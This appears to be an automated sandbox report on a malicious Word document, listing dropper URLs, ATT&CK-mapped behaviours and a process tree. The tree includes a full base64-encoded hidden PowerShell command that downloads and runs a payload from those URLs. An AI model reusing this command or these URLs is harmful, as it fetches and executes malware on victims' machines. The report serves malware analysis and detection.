d355160c7b170737c3e089287ecf40729295983f77f14b2d38bd1cbc4ecdd171

General

Target

d355160c7b170737c3e089287ecf40729295983f77f14b2d38bd1cbc4ecdd171.doc
Sample

191213-a9lmbp1xzs
SHA256

d355160c7b170737c3e089287ecf40729295983f77f14b2d38bd1cbc4ecdd171

Score

8^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://bahcelievler-rotary.org/wp-admin/x4PHK0/

exe.dropper

https://sageth.net/wp-content/fu9yz/

exe.dropper

https://newlandred.com/wp-snapshots/CsfcooA/

exe.dropper

https://hellothuoctot.com/wp-content/VzMjXw/

exe.dropper

http://www.enegix.com/wp-includes/21fap/

Signatures

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4440	Powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4440	Powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4572	611.exe

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2920 wrote to memory of 4372	2920	SppExtComObj.exe	76
PID 4440 wrote to memory of 4572	4440	Powershell.exe	80

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4928	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4928	WINWORD.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4928	WINWORD.EXE
4572	611.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d355160c7b170737c3e089287ecf40729295983f77f14b2d38bd1cbc4ecdd171.doc" /o ""
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4928

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:2920
- C:\Windows\System32\SLUI.exe
  "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
  2⤵
  PID:4372

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABGAGQAeQB1AHQAcABvAHMAPQAnAFoAegBrAGsAbgB1AHkAZQBtAGEAcwB0ACcAOwAkAE8AbgBpAHAAbgBwAGEAcgBkAHIAIAA9ACAAJwA2ADEAMQAnADsAJABVAHAAZgB0AHQAdQByAHkAbQBqAGEAYQA9ACcAVQBtAHoAbwB0AG4AaQBlACcAOwAkAEwAeQBpAG4AbwBvAGQAeQB4AHcAawBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAG4AaQBwAG4AcABhAHIAZAByACsAJwAuAGUAeABlACcAOwAkAEYAcwB6AGUAcABqAGwAbgA9ACcAWgBhAGkAegBiAHoAaQBiACcAOwAkAE0AaAB1AG8AZABvAHEAbgBpAGgAeAA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBjAGwAaQBlAG4AVAA7ACQAUwBpAG0AZwBzAGkAbgB6AD0AJwBoAHQAdABwAHMAOgAvAC8AYgBhAGgAYwBlAGwAaQBlAHYAbABlAHIALQByAG8AdABhAHIAeQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AeAA0AFAASABLADAALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGEAZwBlAHQAaAAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAdQA5AHkAegAvACoAaAB0AHQAcABzADoALwAvAG4AZQB3AGwAYQBuAGQAcgBlAGQALgBjAG8AbQAvAHcAcAAtAHMAbgBhAHAAcwBoAG8AdABzAC8AQwBzAGYAYwBvAG8AQQAvACoAaAB0AHQAcABzADoALwAvAGgAZQBsAGwAbwB0AGgAdQBvAGMAdABvAHQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBWAHoATQBqAFgAdwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAbgBlAGcAaQB4AC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAyADEAZgBhAHAALwAnAC4AIgBzAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQATgB1AHYAYgByAG4AdABlAD0AJwBLAHAAbQBkAG4AYgB2AG4AaQBkAHgAbQBtACcAOwBmAG8AcgBlAGEAYwBoACgAJABUAHcAYQB4AGEAbABkAGQAeQBiAGoAYwAgAGkAbgAgACQAUwBpAG0AZwBzAGkAbgB6ACkAewB0AHIAeQB7ACQATQBoAHUAbwBkAG8AcQBuAGkAaAB4AC4AIgBEAE8AYABXAG4AYABsAE8AQQBgAGQARgBpAEwARQAiACgAJABUAHcAYQB4AGEAbABkAGQAeQBiAGoAYwAsACAAJABMAHkAaQBuAG8AbwBkAHkAeAB3AGsAYQApADsAJABVAGQAYQBuAHQAZgBnAGgAPQAnAEwAeAB4AG0AYgBwAGgAcgBxAHAAagAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEwAeQBpAG4AbwBvAGQAeQB4AHcAawBhACkALgAiAEwAZQBgAE4ARwBUAEgAIgAgAC0AZwBlACAAMwAwADcANAA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAUgBUACIAKAAkAEwAeQBpAG4AbwBvAGQAeQB4AHcAawBhACkAOwAkAEEAZQB2AHMAdABkAGEAaQBzAHgAPQAnAFMAcgBjAHIAZQBpAGsAbgBiAGQAJwA7AGIAcgBlAGEAawA7ACQASABvAHEAdgB3AG0AdQBnAD0AJwBNAG8AawBvAG4AeQBvAGQAZQBhAG8AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUABvAHkAbABiAGQAcgBrAHcAaAB1AGsAZgA9ACcATABnAGQAcgBtAGUAZQBuAGcAJwA=
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4440
- C:\Users\Admin\611.exe
  "C:\Users\Admin\611.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4572

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads